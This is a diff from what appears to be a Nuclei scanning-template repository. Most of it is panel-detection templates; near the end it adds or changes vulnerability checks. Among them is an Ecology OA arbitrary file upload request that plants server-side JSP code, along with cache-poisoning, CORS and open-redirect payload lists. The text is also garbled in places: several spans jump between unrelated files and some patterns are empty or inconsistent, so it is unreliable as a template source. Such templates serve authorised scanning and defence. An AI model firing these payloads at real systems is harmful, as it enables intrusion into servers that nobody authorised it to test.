b/exposed-panels/axigen-webadmin.yaml @@ -1,11 +1,16 @@ id: axigen-webadmin info: - name: Axigen Web Admin + name: Axigen Web Admin Detection author: dhiyaneshDk severity: info + description: An Axigen Web Admin panel was discovered. + reference: + - https://www.axigen.com/ + classification: + cwe-id: CWE-200 metadata: - shodan-query: 'http.title:"Axigen WebAdmin"' + shodan-query: http.title:"Axigen WebAdmin" tags: axigen,panel requests: @@ -17,8 +22,10 @@ requests: matchers: - type: word words: - - 'Axigen WebAdmin' + - 'Axigen WebAdmin' - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/axigen-webmail.yaml b/exposed-panels/axigen-webmail.yaml index 859ced9706..0b61e4d8bd 100644 --- a/exposed-panels/axigen-webmail.yaml +++ b/exposed-panels/axigen-webmail.yaml @@ -1,11 +1,16 @@ id: axigen-webmail info: - name: Axigen WebMail - author: dhiyaneshDk + name: Axigen WebMail PanelDetection + author: dhiyaneshDk,idealphase severity: info + description: An Axigen webmail panel was discovered. + reference: + - https://www.axigen.com/ + classification: + cwe-id: CWE-200 metadata: - shodan-query: 'http.title:"Axigen WebMail"' + shodan-query: http.title:"Axigen WebMail" tags: axigen,panel requests: @@ -15,10 +20,21 @@ requests: matchers-condition: and matchers: - - type: word - words: - - 'Axigen WebMail' + - type: regex + regex: + - '(?i)(Axigen WebMail)' + - 'Axigen Standard Webmail - (.*)' + condition: or - type: status status: - 200 + + extractors: + - type: regex + group: 1 + part: body + regex: + - '' - 'Bolt requires JavaScript to function properly and continuing without it might corrupt or erase data.' - 'Bolt » Login' - - 'Cookies are required to log on to Bolt. Please allow cookies.' \ No newline at end of file + - 'Cookies are required to log on to Bolt. Please allow cookies.' + + - type: status + status: + - 200 diff --git a/exposed-panels/bomgar-login-panel.yaml b/exposed-panels/bomgar-login-panel.yaml new file mode 100644 index 0000000000..9234016689 --- /dev/null +++ b/exposed-panels/bomgar-login-panel.yaml @@ -0,0 +1,29 @@ +id: bomgar-login-panel + +info: + name: Bomgar Login Panel + author: pdteam + severity: info + tags: panel,bomgar,beyondtrust + +requests: + - method: GET + path: + - "{{BaseURL}}/favicon.ico" + - "{{BaseURL}}/appliance/login.ns" + + stop-at-first-match: true + matchers-condition: or + matchers: + + - type: dsl + dsl: + - "status_code==200" + - "('829321644' == mmh3(base64_py(body)))" + condition: and + + - type: dsl + dsl: + - "status_code==200" + - "contains(tolower(body), 'bomgar')" + condition: and \ No newline at end of file diff --git a/technologies/bookstack-detect.yaml b/exposed-panels/bookstack-panel.yaml similarity index 50% rename from technologies/bookstack-detect.yaml rename to exposed-panels/bookstack-panel.yaml index 6dde7e550c..68ceb1a90c 100644 --- a/technologies/bookstack-detect.yaml +++ b/exposed-panels/bookstack-panel.yaml @@ -1,12 +1,15 @@ -id: bookstack-detect +id: bookstack-panel info: - name: BookStack detect - author: cyllective + name: BookStack Panel Login + author: cyllective,daffainfo severity: info - description: Detects BookStack - tags: tech,bookstack - reference: https://github.com/BookStackApp/BookStack + description: A platform to create documentation/wiki content built with PHP & Laravel + reference: + - https://github.com/BookStackApp/BookStack + metadata: + shodan-query: http.title:"BookStack" + tags: panel,bookstack requests: - method: GET @@ -22,6 +25,15 @@ requests: - 'BookStack' - 'BookStack' + - type: word + part: header + words: + - 'Set-Cookie: bookstack_session' + + - type: status + status: + - 200 + extractors: - type: regex part: body diff --git a/exposed-panels/buddy-panel.yaml b/exposed-panels/buddy-panel.yaml new file mode 100644 index 0000000000..f3bac86b16 --- /dev/null +++ b/exposed-panels/buddy-panel.yaml @@ -0,0 +1,31 @@ +id: buddy-panel + +info: + name: Buddy Panel Detect + author: thardt-praetorian + severity: info + reference: + - https://buddy.works + metadata: + shodan-query: http.favicon.hash:-850502287 + tags: panel,buddy,cicd + +requests: + - method: GET + path: + - '{{BaseURL}}' + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'Buddy App' + condition: or + + - type: status + status: + - 200 diff --git a/exposed-panels/buildbot-panel.yaml b/exposed-panels/buildbot-panel.yaml new file mode 100644 index 0000000000..b5d2d36574 --- /dev/null +++ b/exposed-panels/buildbot-panel.yaml @@ -0,0 +1,29 @@ +id: buildbot-panel + +info: + name: Buildbot Panel Detect + author: thardt-praetorian + severity: info + reference: + - https://buildbot.net + metadata: + shodan-query: http.title:"BuildBot" + tags: panel,buildbot,cicd + +requests: + - method: GET + path: + - '{{BaseURL}}' + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'Buildbot' + + - type: status + status: + - 200 diff --git a/technologies/cacti-detect.yaml b/exposed-panels/cacti-panel.yaml similarity index 62% rename from technologies/cacti-detect.yaml rename to exposed-panels/cacti-panel.yaml index 10d928122a..63880c5c39 100644 --- a/technologies/cacti-detect.yaml +++ b/exposed-panels/cacti-panel.yaml @@ -1,10 +1,11 @@ -id: cacti-detect +id: cacti-panel + info: - name: Detect Cacti - author: geeknik - description: Cacti is a complete network graphing solution -- https://www.cacti.net/ + name: Cacti Login Panel + author: geeknik,daffainfo severity: info - tags: tech,cacti + description: Cacti is a complete network graphing solution -- https://www.cacti.net/ + tags: tech,cacti,login requests: - method: GET @@ -12,15 +13,17 @@ requests: - "{{BaseURL}}" - "{{BaseURL}}/cacti/" + stop-at-first-match: true matchers-condition: and matchers: - type: status status: - 200 + - type: word part: body words: - - "Login to Cacti" + - "Login to Cacti" - "The Cacti Group" condition: and @@ -30,7 +33,8 @@ requests: - Cacti+ extractors: - - type: kval - part: header - kval: - - Set_Cookie + - type: regex + part: body + group: 1 + regex: + - "

Version (.*) |" diff --git a/exposed-panels/calendarix-panel.yaml b/exposed-panels/calendarix-panel.yaml index a8581f03b6..f71d64b01c 100644 --- a/exposed-panels/calendarix-panel.yaml +++ b/exposed-panels/calendarix-panel.yaml @@ -4,7 +4,7 @@ info: name: Calendarix login detect author: r3dg33k severity: info - tags: panel,calendarix + tags: panel,calendarix,login requests: - method: GET diff --git a/exposed-panels/camunda-login-panel.yaml b/exposed-panels/camunda-login-panel.yaml index ca5b5f04c2..5840e1ac5c 100644 --- a/exposed-panels/camunda-login-panel.yaml +++ b/exposed-panels/camunda-login-panel.yaml @@ -1,11 +1,13 @@ id: camunda-login-panel + info: name: Camunda Login panel author: alifathi-h1 severity: info description: Default Credentials of demo:demo on Camunda application. - reference: https://docs.camunda.org/manual/7.15/webapps/admin/user-management/ - tags: camunda,panel + reference: + - https://docs.camunda.org/manual/7.15/webapps/admin/user-management/ + tags: camunda,panel,login requests: - method: GET diff --git a/exposed-panels/cas-login.yaml b/exposed-panels/cas-login.yaml new file mode 100644 index 0000000000..63128dc97a --- /dev/null +++ b/exposed-panels/cas-login.yaml @@ -0,0 +1,22 @@ +id: cas-login + +info: + name: CAS Login Panel + author: pdteam + severity: info + metadata: + shodan-query: http.title:'CAS - Central Authentication Service' + github: https://github.com/apereo/cas + tags: apereo,cas,panel,login + +requests: + - method: GET + path: + - "{{BaseURL}}/cas/login" + + redirects: true + max-redirects: 2 + matchers: + - type: word + words: + - 'Central Authentication Service' diff --git a/exposed-panels/casdoor-login.yaml b/exposed-panels/casdoor-login.yaml new file mode 100644 index 0000000000..2ae5b5d8cc --- /dev/null +++ b/exposed-panels/casdoor-login.yaml @@ -0,0 +1,26 @@ +id: casdoor-login + +info: + name: Casdoor Login Panel + author: princechaddha + severity: info + metadata: + shodan-query: http.title:"Casdoor" + tags: panel,casdoor + +requests: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Casdoor" + + - type: status + status: + - 200 diff --git a/exposed-panels/casemanager-panel.yaml b/exposed-panels/casemanager-panel.yaml new file mode 100644 index 0000000000..d32cde87a7 --- /dev/null +++ b/exposed-panels/casemanager-panel.yaml @@ -0,0 +1,24 @@ +id: casemanager-panel + +info: + name: CaseManager Panel + author: ffffffff0x + severity: info + metadata: + fofa-query: title="CaseManager" + tags: casemanager,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers-condition: and + matchers: + - type: word + words: + - "CaseManager" + + - type: status + status: + - 200 diff --git a/exposed-panels/centreon-panel.yaml b/exposed-panels/centreon-panel.yaml new file mode 100644 index 0000000000..88baaaf63d --- /dev/null +++ b/exposed-panels/centreon-panel.yaml @@ -0,0 +1,34 @@ +id: centreon-panel + +info: + name: Centreon Login Panel + author: pikpikcu,daffainfo + severity: info + metadata: + shodan-query: http.title:"Centreon" + tags: panel,centreon,login + +requests: + - method: GET + path: + - "{{BaseURL}}/centreon/index.php" + + matchers-condition: and + matchers: + - type: word + part: body + condition: or + words: + - 'Centreon - IT & Network Monitoring' + - 'SSL Network Extender Login" + + - type: status + status: + - 200 diff --git a/exposed-panels/circarlife-setup.yaml b/exposed-panels/circarlife-setup.yaml index f1be4d4778..7f06746f27 100644 --- a/exposed-panels/circarlife-setup.yaml +++ b/exposed-panels/circarlife-setup.yaml @@ -3,10 +3,11 @@ id: circarlife-setup info: name: Exposed CirCarLife Setup Page author: geeknik - description: CirCarLife is an internet-connected electric vehicle charging station - reference: https://circontrol.com/ severity: critical - tags: scada,circontrorl,circarlife,setup,exposure,panel + description: CirCarLife is an internet-connected electric vehicle charging station + reference: + - https://circontrol.com/ + tags: scada,circontrol,circarlife,setup,exposure,panel requests: - method: GET diff --git a/exposed-panels/cisco/cisco-ace-device-manager.yaml b/exposed-panels/cisco/cisco-ace-device-manager.yaml index 09704c579f..70e4205e76 100644 --- a/exposed-panels/cisco/cisco-ace-device-manager.yaml +++ b/exposed-panels/cisco/cisco-ace-device-manager.yaml @@ -4,9 +4,9 @@ info: name: ACE 4710 Device Manager author: dhiyaneshDk severity: info - tags: panel,cisco metadata: - shodan-query: 'html:"ACE 4710 Device Manager"' + shodan-query: html:"ACE 4710 Device Manager" + tags: panel,cisco requests: - method: GET diff --git a/exposed-panels/cisco-asa-panel.yaml b/exposed-panels/cisco/cisco-asa-panel.yaml similarity index 78% rename from exposed-panels/cisco-asa-panel.yaml rename to exposed-panels/cisco/cisco-asa-panel.yaml index 0db529493b..b87b8121bf 100644 --- a/exposed-panels/cisco-asa-panel.yaml +++ b/exposed-panels/cisco/cisco-asa-panel.yaml @@ -15,6 +15,8 @@ requests: max-redirects: 2 matchers: - type: word - words: - - "SSL VPN Service" part: body + words: + - "/+CSCOU+/portal.css" + - "SSL VPN Service" + condition: or \ No newline at end of file diff --git a/exposed-panels/cisco/cisco-edge-340.yaml b/exposed-panels/cisco/cisco-edge-340.yaml index 17a60b6a18..4dbd5caf85 100644 --- a/exposed-panels/cisco/cisco-edge-340.yaml +++ b/exposed-panels/cisco/cisco-edge-340.yaml @@ -4,9 +4,9 @@ info: name: Cisco Edge 340 author: dhiyaneshDk severity: info - tags: panel,cisco metadata: - shodan-query: 'http.title:"Cisco Edge 340"' + shodan-query: http.title:"Cisco Edge 340" + tags: panel,cisco requests: - method: GET diff --git a/exposed-panels/cisco-finesse-login.yaml b/exposed-panels/cisco/cisco-finesse-login.yaml similarity index 88% rename from exposed-panels/cisco-finesse-login.yaml rename to exposed-panels/cisco/cisco-finesse-login.yaml index 0944959e91..ad8938564b 100644 --- a/exposed-panels/cisco-finesse-login.yaml +++ b/exposed-panels/cisco/cisco-finesse-login.yaml @@ -4,7 +4,8 @@ info: name: Cisco Finesse Login author: dhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/6824 + reference: + - https://www.exploit-db.com/ghdb/6824 tags: panel,cisco requests: diff --git a/exposed-panels/cisco-integrated-login.yaml b/exposed-panels/cisco/cisco-integrated-login.yaml similarity index 88% rename from exposed-panels/cisco-integrated-login.yaml rename to exposed-panels/cisco/cisco-integrated-login.yaml index 0804d5a189..5f716a0018 100644 --- a/exposed-panels/cisco-integrated-login.yaml +++ b/exposed-panels/cisco/cisco-integrated-login.yaml @@ -4,7 +4,8 @@ info: name: Cisco Integrated Management Controller Login author: dhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/3859 + reference: + - https://www.exploit-db.com/ghdb/3859 tags: panel,cisco requests: diff --git a/exposed-panels/cisco-meraki-exposure.yaml b/exposed-panels/cisco/cisco-meraki-exposure.yaml similarity index 90% rename from exposed-panels/cisco-meraki-exposure.yaml rename to exposed-panels/cisco/cisco-meraki-exposure.yaml index 112800ebd8..d14835d3a6 100644 --- a/exposed-panels/cisco-meraki-exposure.yaml +++ b/exposed-panels/cisco/cisco-meraki-exposure.yaml @@ -4,7 +4,8 @@ info: name: Cisco Meraki cloud & security Appliances Information Disclosure author: dhiyaneshDK,r3naissance severity: info - reference: https://www.exploit-db.com/ghdb/6708 + reference: + - https://www.exploit-db.com/ghdb/6708 tags: panel,cisco,meraki,disclosure requests: diff --git a/exposed-panels/cisco/cisco-prime-infrastructure.yaml b/exposed-panels/cisco/cisco-prime-infrastructure.yaml index 1ef40b53b8..2b4d60a237 100644 --- a/exposed-panels/cisco/cisco-prime-infrastructure.yaml +++ b/exposed-panels/cisco/cisco-prime-infrastructure.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDk severity: info metadata: - shodan-query: 'http.title:"prime infrastructure"' + shodan-query: http.title:"prime infrastructure" tags: panel,cisco requests: diff --git a/exposed-panels/cisco-sd-wan.yaml b/exposed-panels/cisco/cisco-sd-wan.yaml similarity index 69% rename from exposed-panels/cisco-sd-wan.yaml rename to exposed-panels/cisco/cisco-sd-wan.yaml index 6376c9a8ca..0f9113cc89 100644 --- a/exposed-panels/cisco-sd-wan.yaml +++ b/exposed-panels/cisco/cisco-sd-wan.yaml @@ -4,7 +4,8 @@ info: name: Cisco SD-WAN panel author: z3bd severity: info - reference: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-bufovulns-B5NrSHbj + reference: + - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-bufovulns-B5NrSHbj tags: panel,cisco requests: diff --git a/exposed-panels/cisco/cisco-secure-cn.yaml b/exposed-panels/cisco/cisco-secure-cn.yaml index 6914a5cc7e..44f85105e8 100644 --- a/exposed-panels/cisco/cisco-secure-cn.yaml +++ b/exposed-panels/cisco/cisco-secure-cn.yaml @@ -4,9 +4,9 @@ info: name: Cisco Secure CN author: dhiyaneshDk severity: info - tags: panel,cisco metadata: - shodan-query: 'http.title:"Cisco Secure CN"' + shodan-query: http.title:"Cisco Secure CN" + tags: panel,cisco requests: - method: GET diff --git a/exposed-panels/cisco-secure-desktop.yaml b/exposed-panels/cisco/cisco-secure-desktop.yaml similarity index 100% rename from exposed-panels/cisco-secure-desktop.yaml rename to exposed-panels/cisco/cisco-secure-desktop.yaml diff --git a/exposed-panels/cisco-sendgrid.yaml b/exposed-panels/cisco/cisco-sendgrid.yaml similarity index 85% rename from exposed-panels/cisco-sendgrid.yaml rename to exposed-panels/cisco/cisco-sendgrid.yaml index d9708bf9f3..7148f305d0 100644 --- a/exposed-panels/cisco-sendgrid.yaml +++ b/exposed-panels/cisco/cisco-sendgrid.yaml @@ -4,7 +4,8 @@ info: name: Cisco ServiceGrid author: dhiyaneshDK severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Cisco+ServiceGrid%22 + reference: + - https://www.shodan.io/search?query=http.title%3A%22Cisco+ServiceGrid%22 tags: panel,cisco requests: diff --git a/exposed-panels/cisco/cisco-systems-login.yaml b/exposed-panels/cisco/cisco-systems-login.yaml index 25607b3bbf..96ae7b9ee4 100644 --- a/exposed-panels/cisco/cisco-systems-login.yaml +++ b/exposed-panels/cisco/cisco-systems-login.yaml @@ -2,11 +2,12 @@ id: cisco-systems-login info: name: Cisco Systems Login - author: dhiyaneshDk + author: dhiyaneshDk,idealphase severity: info - tags: panel,cisco metadata: - shodan-query: 'http.title:"Cisco Systems Login"' + shodan-query: http.title:"Cisco Systems Login" + google-query: intitle:"Cisco Systems Login" + tags: panel,cisco requests: - method: GET @@ -18,8 +19,14 @@ requests: - type: word part: body words: - - "Cisco Systems Login" + - "Cisco Systems Login" - type: status status: - 200 + + extractors: + - type: regex + group: 1 + regex: + - '" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/vulnerabilities/ecology/ecology-arbitrary-file-upload.yaml b/vulnerabilities/ecology/ecology-arbitrary-file-upload.yaml new file mode 100644 index 0000000000..1b96e89056 --- /dev/null +++ b/vulnerabilities/ecology/ecology-arbitrary-file-upload.yaml @@ -0,0 +1,38 @@ +id: ecology-arbitrary-file-upload + +info: + name: Ecology Arbitrary File Upload + author: ritikchaddha + severity: medium + reference: + - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g + metadata: + fofa-query: app="泛微-协同办公OA" + tags: ecology,upload,fileupload,intrusive + +requests: + - raw: + - | + POST /page/exportImport/uploadOperation.jsp HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwo + + ------WebKitFormBoundaryFy3iNVBftjP6IOwo + Content-Disposition: form-data; name="file"; filename="12.jsp" + Content-Type: application/octet-stream + + <%out.print(364536*876356);new java.io.File(application.getRealPath(request.getServletPath())).delete();%> + ------WebKitFormBoundaryFy3iNVBftjP6IOwo-- + - | + GET /page/exportImport/fileTransfer/{{randstr}}.jsp HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "status_code_1 == 200" + - "contains(body_2, '319463310816') || status_code_2 == 200" + condition: and diff --git a/vulnerabilities/generic/cache-poisoning.yaml b/vulnerabilities/generic/cache-poisoning.yaml index fa843b73a4..1703f38d93 100644 --- a/vulnerabilities/generic/cache-poisoning.yaml +++ b/vulnerabilities/generic/cache-poisoning.yaml @@ -2,8 +2,8 @@ id: cache-poisoning info: name: Cache Poisoning - author: melbadry9,xelkomy - severity: info + author: melbadry9,xelkomy,akincibor,dogasantos + severity: low reference: - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning - https://portswigger.net/research/practical-web-cache-poisoning @@ -12,16 +12,22 @@ info: requests: - raw: - | - GET /?mel=9 HTTP/1.1 - X-Forwarded-Prefix: cache.example.com - X-Forwarded-Host: cache.example.com - X-Forwarded-For: cache.example.com + GET /?{{randstr}}=9 HTTP/1.1 + X-Forwarded-Prefix: prefix.cache.example.com + X-Forwarded-Host: host.cache.example.com + X-Forwarded-For: for.cache.example.com - | - GET /?mel=9 HTTP/1.1 + GET /?{{randstr}}=9 HTTP/1.1 req-condition: true matchers: - type: dsl dsl: - 'contains(body_2, "cache.example.com")' + + extractors: + - type: regex + part: response + regex: + - "(prefix|host|for).cache.example.com" diff --git a/vulnerabilities/generic/cors-misconfig.yaml b/vulnerabilities/generic/cors-misconfig.yaml index a476df65b4..0c21683c10 100644 --- a/vulnerabilities/generic/cors-misconfig.yaml +++ b/vulnerabilities/generic/cors-misconfig.yaml @@ -1,63 +1,40 @@ id: cors-misconfig info: - name: Basic CORS misconfiguration - author: nadino,G4L1T0,convisoappsec,pdteam + name: CORS Misconfiguration + author: nadino,g4l1t0,convisoappsec,pdteam,breno_css severity: info - reference: https://portswigger.net/web-security/cors - tags: cors,generic + reference: + - https://portswigger.net/web-security/cors + - https://www.corben.io/advanced-cors-techniques/ + - https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/ + tags: cors,generic,misconfig requests: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} + Origin: {{cors_origin}} - - | - GET / HTTP/1.1 - Host: {{Hostname}} - Origin: {{randstr}}.tld - - - | - GET / HTTP/1.1 - Host: {{Hostname}} - Origin: null - -# TODO's for future as currently {{Hostname}} is not supported in matchers -# Origin: {{randstr}}.{{Hostname}} -# Origin: {{Hostname}}.{{randstr}}.tld -# Origin: {{Hostname}}{{randstr}}.tld -# Origin: {{Hostname}}_.{{randstr}}.tld -# Origin: {{Hostname}}%60.{{randstr}}.tld -# Origin: http://{{Hostname}} -# Origin: http://{{randstr}}.{{Hostname}} + payloads: + cors_origin: + - "https://{{tolower(rand_base(5))}}{{RDN}}" # Arbitrary domain + - "https://{{tolower(rand_base(5))}}.com" # Arbitrary domain + - "https://{{FQDN}}.{{tolower(rand_base(5))}}.com" # Arbitrary domain + - "https://{{FQDN}}{{tolower(rand_base(5))}}.com" # Arbitrary domain + - "https://{{FQDN}}_.{{tolower(rand_base(5))}}.com" # Arbitrary domain + - "https://{{FQDN}}%60.{{tolower(rand_base(5))}}.com" # Arbitrary domain + - "null" # null origin + - "https://{{tolower(rand_base(5))}}.{{RDN}}" # Arbitrary subdomain + - "http://{{tolower(rand_base(5))}}.{{RDN}}" # Arbitrary subdomain over http + stop-at-first-match: true matchers-condition: or matchers: - type: dsl name: arbitrary-origin dsl: - - "contains(tolower(all_headers), 'access-control-allow-origin: {{randstr}}.tld')" + - "contains(tolower(all_headers), 'access-control-allow-origin: {{cors_origin}}')" - "contains(tolower(all_headers), 'access-control-allow-credentials: true')" - condition: and - - - type: dsl - name: null-origin - dsl: - - "contains(tolower(all_headers), 'access-control-allow-origin: null')" - - "contains(tolower(all_headers), 'access-control-allow-credentials: true')" - condition: and - - - type: dsl - name: wildcard-acac - dsl: - - "contains(tolower(all_headers), 'access-control-allow-origin: *')" - - "contains(tolower(all_headers), 'access-control-allow-credentials: true')" - condition: and - - - type: dsl - name: wildcard-no-acac - dsl: - - "contains(tolower(all_headers), 'access-control-allow-origin: *')" - - "!contains(tolower(all_headers), 'access-control-allow-credentials: true')" - condition: and + condition: and \ No newline at end of file diff --git a/vulnerabilities/generic/error-based-sql-injection.yaml b/vulnerabilities/generic/error-based-sql-injection.yaml index c0119a2e3c..d41cf43580 100644 --- a/vulnerabilities/generic/error-based-sql-injection.yaml +++ b/vulnerabilities/generic/error-based-sql-injection.yaml @@ -5,7 +5,7 @@ info: author: geeknik severity: high description: Detects the possibility of SQL injection in 29 database engines. Inspired by https://github.com/sqlmapproject/sqlmap/blob/master/data/xml/errors.xml. - tags: sqli,generic + tags: sqli,generic,error requests: - method: GET diff --git a/vulnerabilities/generic/generic-blind-xxe.yaml b/vulnerabilities/generic/generic-blind-xxe.yaml index a08f153493..5fc978ae6e 100644 --- a/vulnerabilities/generic/generic-blind-xxe.yaml +++ b/vulnerabilities/generic/generic-blind-xxe.yaml @@ -4,7 +4,7 @@ info: name: Generic Blind XXE author: geeknik severity: high - tags: xxe,generic + tags: xxe,generic,blind requests: - raw: diff --git a/vulnerabilities/generic/oob-header-based-interaction.yaml b/vulnerabilities/generic/oob-header-based-interaction.yaml index 332914d8d0..36ddaaae60 100644 --- a/vulnerabilities/generic/oob-header-based-interaction.yaml +++ b/vulnerabilities/generic/oob-header-based-interaction.yaml @@ -5,7 +5,8 @@ info: author: pdteam severity: info description: The remote server fetched a spoofed URL from the request headers. - reference: https://github.com/PortSwigger/collaborator-everywhere + reference: + - https://github.com/PortSwigger/collaborator-everywhere tags: oast,ssrf,generic requests: diff --git a/vulnerabilities/generic/oob-param-based-interaction.yaml b/vulnerabilities/generic/oob-param-based-interaction.yaml index 69955c6ee2..578570a67b 100644 --- a/vulnerabilities/generic/oob-param-based-interaction.yaml +++ b/vulnerabilities/generic/oob-param-based-interaction.yaml @@ -5,7 +5,8 @@ info: author: pdteam severity: info description: The remote server fetched a spoofed URL from the request parameters. - reference: https://github.com/PortSwigger/collaborator-everywhere + reference: + - https://github.com/PortSwigger/collaborator-everywhere tags: oast,ssrf,generic requests: diff --git a/vulnerabilities/generic/open-redirect.yaml b/vulnerabilities/generic/open-redirect.yaml index b317702918..2598c937eb 100644 --- a/vulnerabilities/generic/open-redirect.yaml +++ b/vulnerabilities/generic/open-redirect.yaml @@ -8,42 +8,115 @@ info: tags: redirect,generic requests: - - method: GET + - raw: + - | + GET /{{redirect}} HTTP/1.1 + Host: {{Hostname}} - path: - - '{{BaseURL}}/example.com/' - - '{{BaseURL}}/example.com//' - - '{{BaseURL}}///;@example.com' - - '{{BaseURL}}///example.com/%2F..' - - '{{BaseURL}}/////example.com' - - '{{BaseURL}}//example.com/%2F..' - - '{{BaseURL}}//example.com/..;/css' - - '{{BaseURL}}/example%E3%80%82com' - - '{{BaseURL}}/%5Cexample.com' - - '{{BaseURL}}/example.com' - - '{{BaseURL}}//example.com/' - - '{{BaseURL}}/%00/example.com/' - - '{{BaseURL}}/%09/example.com/' - - '{{BaseURL}}/%0a/example.com/' - - '{{BaseURL}}/%0d/example.com/' - - '{{BaseURL}}////example.com/%2f%2e%2e' - - '{{BaseURL}}/%5cexample.com/%2f%2e%2e' - - '{{BaseURL}}/{{BaseURL}}example.com' - - '{{BaseURL}}//{{BaseURL}}example.com/' - - '{{BaseURL}}////{{BaseURL}}example.com/%2f%2e%2e' - - '{{BaseURL}}/%5c{{BaseURL}}example.com/%2f%2e%2e' - - '{{BaseURL}}/?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&diexample.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com' - - '{{BaseURL}}/1/_https@example.com' + payloads: + redirect: + - '%0a/example.com/' + - '%0d/example.com/' + - '%00/example.com/' + - '%09/example.com/' + - '%5C%5Cexample.com/%252e%252e%252f' + - '%5Cexample.com' + - '%5cexample.com/%2f%2e%2e' + - '%5c{{RootURL}}example.com/%2f%2e%2e' + - '../example.com' + - '.example.com' + - '/%5cexample.com' + - '////\;@example.com' + - '////example.com' + - '///example.com' + - '///example.com/%2f%2e%2e' + - '///example.com@//' + - '///{{RootURL}}example.com/%2f%2e%2e' + - '//;@example.com' + - '//\/example.com/' + - '//\@example.com' + - '//\example.com' + - '//\texample.com/' + - '//example.com/%2F..' + - '//example.com//' + - '//example.com@//' + - '//example.com\texample.com/' + - '//https://example.com@//' + - '/<>//example.com' + - '/\/\/example.com/' + - '/\/example.com' + - '/\example.com' + - '/example.com' + - '/example.com/%2F..' + - '/example.com/' + - '/example.com/..;/css' + - '/https:example.com' + - '/{{RootURL}}example.com/' + - '/〱example.com' + - '/〵example.com' + - '/ゝexample.com' + - '/ーexample.com' + - '/ーexample.com' + - '<>//example.com' + - '@example.com' + - '@https://example.com' + - '\/\/example.com/' + - 'example%E3%80%82com' + - 'example.com' + - 'example.com/' + - 'example.com//' + - 'example.com;@' + - 'https%3a%2f%2fexample.com%2f' + - 'https:%0a%0dexample.com' + - 'https://%0a%0dexample.com' + - 'https://%09/example.com' + - 'https://%2f%2f.example.com/' + - 'https://%3F.example.com/' + - 'https://%5c%5c.example.com/' + - 'https://%5cexample.com@' + - 'https://%23.example.com/' + - 'https://.example.com' + - 'https://////example.com' + - 'https:///example.com' + - 'https:///example.com/%2e%2e' + - 'https:///example.com/%2f%2e%2e' + - 'https:///example.com@example.com/%2e%2e' + - 'https:///example.com@example.com/%2f%2e%2e' + - 'https://:80#@example.com/' + - 'https://:80?@example.com/' + - 'https://:@\@example.com' + - 'https://:@example.com\@example.com' + - 'https://:@example.com\@WillBeReplaced.com' + - 'https://;@example.com' + - 'https://\texample.com/' + - 'https://example.com/example.com' + - 'https://example.com/https://example.com/' + - 'https://www.\.example.com' + - 'https:/\/\example.com' + - 'https:/\example.com' + - 'https:/example.com' + - 'https:example.com' + - '{{RootURL}}example.com' + - '〱example.com' + - '〵example.com' + - 'ゝexample.com' + - 'ーexample.com' + - 'ーexample.com' + - '?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&dir=example.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com' stop-at-first-match: true matchers-condition: and matchers: + - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - type: status status: - - 302 - 301 + - 302 + - 307 + - 308 + condition: or \ No 